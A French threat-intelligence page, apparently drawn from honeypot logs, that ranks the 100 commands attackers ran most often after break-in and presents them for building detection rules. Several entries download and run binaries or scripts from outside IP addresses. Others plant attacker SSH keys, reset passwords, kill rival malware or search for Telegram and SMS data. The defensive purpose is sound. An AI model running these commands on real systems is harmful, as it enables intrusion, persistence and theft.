Mis à jour : février 2026

Top 100 des commandes malveillantes

Les commandes les plus exécutées par les attaquants après avoir obtenu l'accès au système. Utile pour la détection d'intrusions et la réponse aux incidents.

9907 commandes en 24h
1.
$lockr -ia .ssh
489 IPs979x
2.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
438 IPs787x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
438 IPs784x
4.
$Enter new UNIX password:
239 IPs626x
5.
$top
248 IPs376x
6.
$w
241 IPs371x
7.
$uname -a
248 IPs369x
8.
$uname
241 IPs369x
9.
$cat /proc/cpuinfo | grep name | wc -l
242 IPs368x
10.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
242 IPs363x
11.
$lscpu | grep Model
237 IPs363x
12.
$uname -m
247 IPs362x
13.
$whoami
231 IPs352x
14.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
235 IPs351x
15.
$crontab -l
237 IPs350x
16.
$cat /proc/cpuinfo | grep model | grep name | wc -l
232 IPs350x
17.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
226 IPs349x
18.
$which ls
234 IPs343x
19.
$ls -lh $(which ls)
209 IPs306x
20.
$cd /data/local/tmp 2>/dev/null || cd /tmp 2>/dev/null || cd /cache; rm -f parm7 parm5 parm6 parm; mkdir -p /data/local/tmp 2>/dev/null; (wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || busybox wget -q -O parm7 http://45.148.120.23/bins/parm7 2>/dev/null || curl -fsSL -o parm7 http://45.148.120.23/bins/parm7 2>/dev/null || nc 45.148.120.23 3338 > parm7 2>/dev/null || toybox nc 45.148.120.23 3338 > parm7 2>/dev/null || bash -c "cat < /dev/tcp/45.148.120.23/3338 > parm7" 2>/dev/null
2 IPs123x
21.
$/bin/./uname -s -v -n -r -m
35 IPs119x
22.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
93 IPs109x
23.
$uname -s -v -n -m 2 > /dev/null
46 IPs71x
24.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
42 IPs61x
25.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
17 IPs45x
26.
$uname -m 2 > /dev/null
17 IPs24x
27.
$cd /data/local/tmp/; wget http://130.12.180.78/manji.arm7 -O manji.arm7 || busybox wget http://130.12.180.78/manji.arm7 -O manji.arm7; chmod 777 manji.arm7; ./manji.arm7 || wget http://130.12.180.78/manji.mips -O manji.mips || busybox wget http://130.12.180.78/manji.mips -O manji.mips; chmod 777 manji.mips; ./manji.mips
4 IPs19x
28.
$uname -s -v -n -r -m
10 IPs18x
29.
$if [ [ ! -d ${HOME}/.ssh ] ]
6 IPs11x
30.
$nproc
5 IPs10x
31.
$then
5 IPs10x
32.
$cd /data/local/tmp/; busybox wget http://103.236.64.121/w.sh; sh w.sh; curl http://103.236.64.121/c.sh; sh c.sh; wget http://103.236.64.121/wget.sh; sh wget.sh; curl http://103.236.64.121/wget.sh; sh wget.sh; busybox wget http://103.236.64.121/wget.sh; sh wget.sh; busybox curl http://103.236.64.121/wget.sh; sh wget.sh
4 IPs8x
33.
$echo hello
4 IPs8x
34.
$Accept-Encoding: gzip
3 IPs7x
35.
$echo "$(getprop ro.product.name 2>/dev/null) $(whoami 2>/dev/null)"
2 IPs6x
36.
$/ip cloud print
3 IPs6x
37.
$fi
3 IPs6x
38.
$pm path com.ufo.miner
2 IPs4x
39.
$Accept: application/sdp
2 IPs3x
40.
$CSeq: 42 OPTIONS
2 IPs3x
41.
$Content-Length: 0
2 IPs3x
42.
$curl2
1 IPs3x
43.
$cd /data/local/tmp/; busybox wget http://180.93.52.81/w.sh; sh w.sh; curl http://180.93.52.81/c.sh; sh c.sh; wget http://180.93.52.81/wget.sh; sh wget.sh; curl http://180.93.52.81/wget.sh; sh wget.sh; busybox wget http://180.93.52.81/wget.sh; sh wget.sh; busybox curl http://180.93.52.81/wget.sh; sh wget.sh
1 IPs3x
44.
$tcpdump -D
1 IPs3x
45.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
46.
$getprop ro.build.version.sdk
1 IPs3x
47.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs3x
48.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs3x
49.
$Max-Forwards: 70
2 IPs3x
50.
$Call-ID: 50000
2 IPs2x
51.
$From: <sip:nm@nm>;tag=root
2 IPs2x
52.
$From: < sip:nm@nm >; tag=root
2 IPs2x
53.
$wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/c.sh; sh c.sh; wget http://130.12.182.211:25196/download.sh; sh download.sh; curl http://130.12.182.211:25196/download.sh; sh download.sh; busybox wget http://130.12.182.211:25196/download.sh; sh download.sh; busybox curl http://130.12.182.211:25196/download.sh; sh download.sh
1 IPs2x
54.
$Contact: <sip:nm@nm>
2 IPs2x
55.
$uname -s -m
2 IPs2x
56.
$Contact: < sip:nm@nm >
2 IPs2x
57.
$shell
1 IPs2x
58.
$rm -f /data/local/tmp/ufo.apk
2 IPs2x
59.
$To: <sip:nm2@nm2>
2 IPs2x
60.
$ps -ef | grep '[Mm]iner'
2 IPs2x
61.
$To: < sip:nm2@nm2 >
2 IPs2x
62.
$ps | grep '[Mm]iner'
2 IPs2x
63.
$cat /proc/cpuinfo
2 IPs2x
64.
$echo Hi | cat -n
2 IPs2x
65.
$echo SHELL_TEST
1 IPs2x
66.
$Accept: */*
1 IPs2x
67.
$hostname
1 IPs2x
68.
$q
1 IPs2x
69.
$echo "123456\n2QiBcZ2MjwG5\n2QiBcZ2MjwG5\n"|passwd
1 IPs1x
70.
$echo "123456\n0gEVlHmRtl6B\n0gEVlHmRtl6B\n"|passwd
1 IPs1x
71.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "ubuntu\nfs37Yg9F\nfs37Yg9F" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCf
1 IPs1x
72.
$echo "12345678\nYGVTc3H7DH4l\nYGVTc3H7DH4l\n"|passwd
1 IPs1x
73.
$echo "12345678\nQfEK2CRWWFes\nQfEK2CRWWFes\n"|passwd
1 IPs1x
74.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "tifVcLRE\ntifVcLRE" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
75.
$echo "12341234\nREVl6E0r3etM\nREVl6E0r3etM\n"|passwd
1 IPs1x
76.
$echo "123!@#\nRwOhGa3dtXuR\nRwOhGa3dtXuR\n"|passwd
1 IPs1x
77.
$echo "123!@#\nOLkYxaWthSMM\nOLkYxaWthSMM\n"|passwd
1 IPs1x
78.
$echo "121212\nUqgx8jGRPSCl\nUqgx8jGRPSCl\n"|passwd
1 IPs1x
79.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "gisela\nfOHvHaCQ\nfOHvHaCQ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCf
1 IPs1x
80.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "carolina\nfFwoId7V\nfFwoId7V" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQ
1 IPs1x
81.
$echo "11\nUrDYY4QhC8E1\nUrDYY4QhC8E1\n"|passwd
1 IPs1x
82.
$echo "09N1RCa1Hs31\nMMynEcRa02bM\nMMynEcRa02bM\n"|passwd
1 IPs1x
83.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "M7DpWwPZ\nM7DpWwPZ" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
84.
$echo "09N1RCa1Hs31\n1TRlExpt2twC\n1TRlExpt2twC\n"|passwd
1 IPs1x
85.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "CEFs490u\nCEFs490u" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
86.
$echo "Bmw_20!_^\ne5TccT4qgoRg\ne5TccT4qgoRg\n"|passwd
1 IPs1x
87.
$echo "Bmw_20!_^\nd7OXXBddrdXM\nd7OXXBddrdXM\n"|passwd
1 IPs1x
88.
$echo "Bmw_20!_^\ncsXzZSTCkYLJ\ncsXzZSTCkYLJ\n"|passwd
1 IPs1x
89.
$echo "Bmw_20!_^\nbJfMlOVTvgrL\nbJfMlOVTvgrL\n"|passwd
1 IPs1x
90.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
1 IPs1x
91.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "9wm2m44Z\n9wm2m44Z" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
92.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "2LobOQUa\n2LobOQUa" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
93.
$echo "Bmw_20!_^\nYh4Ca8XEAi0L\nYh4Ca8XEAi0L\n"|passwd
1 IPs1x
94.
$echo "Bmw_20!_^\nU1ojHrvRqSqT\nU1ojHrvRqSqT\n"|passwd
1 IPs1x
95.
$chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-2023
1 IPs1x
96.
$echo "Bmw_20!_^\nU107ukBhQ34g\nU107ukBhQ34g\n"|passwd
1 IPs1x
97.
$echo "Bmw_20!_^\nNgwDHQ1IgdHH\nNgwDHQ1IgdHH\n"|passwd
1 IPs1x
98.
$echo "Bmw_20!_^\ndrhlHoqQyphD\ndrhlHoqQyphD\n"|passwd
1 IPs1x
99.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "13slip5Y\n13slip5Y" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
100.
$echo "Bmw_20!_^\nLUXqtFrxU6ED\nLUXqtFrxU6ED\n"|passwd
1 IPs1x

Reconnaissance

uname, whoami, cat /etc/passwd

Téléchargement

wget, curl, tftp

Persistance

crontab, chmod, chattr

Mouvement latéral

ssh, scp, ping

Utilisation pour la détection

Ces commandes peuvent être utilisées pour créer des règles de détection dans les SIEM, IDS/IPS et systèmes de surveillance. Surveillez ces motifs dans vos logs pour détecter les intrusions.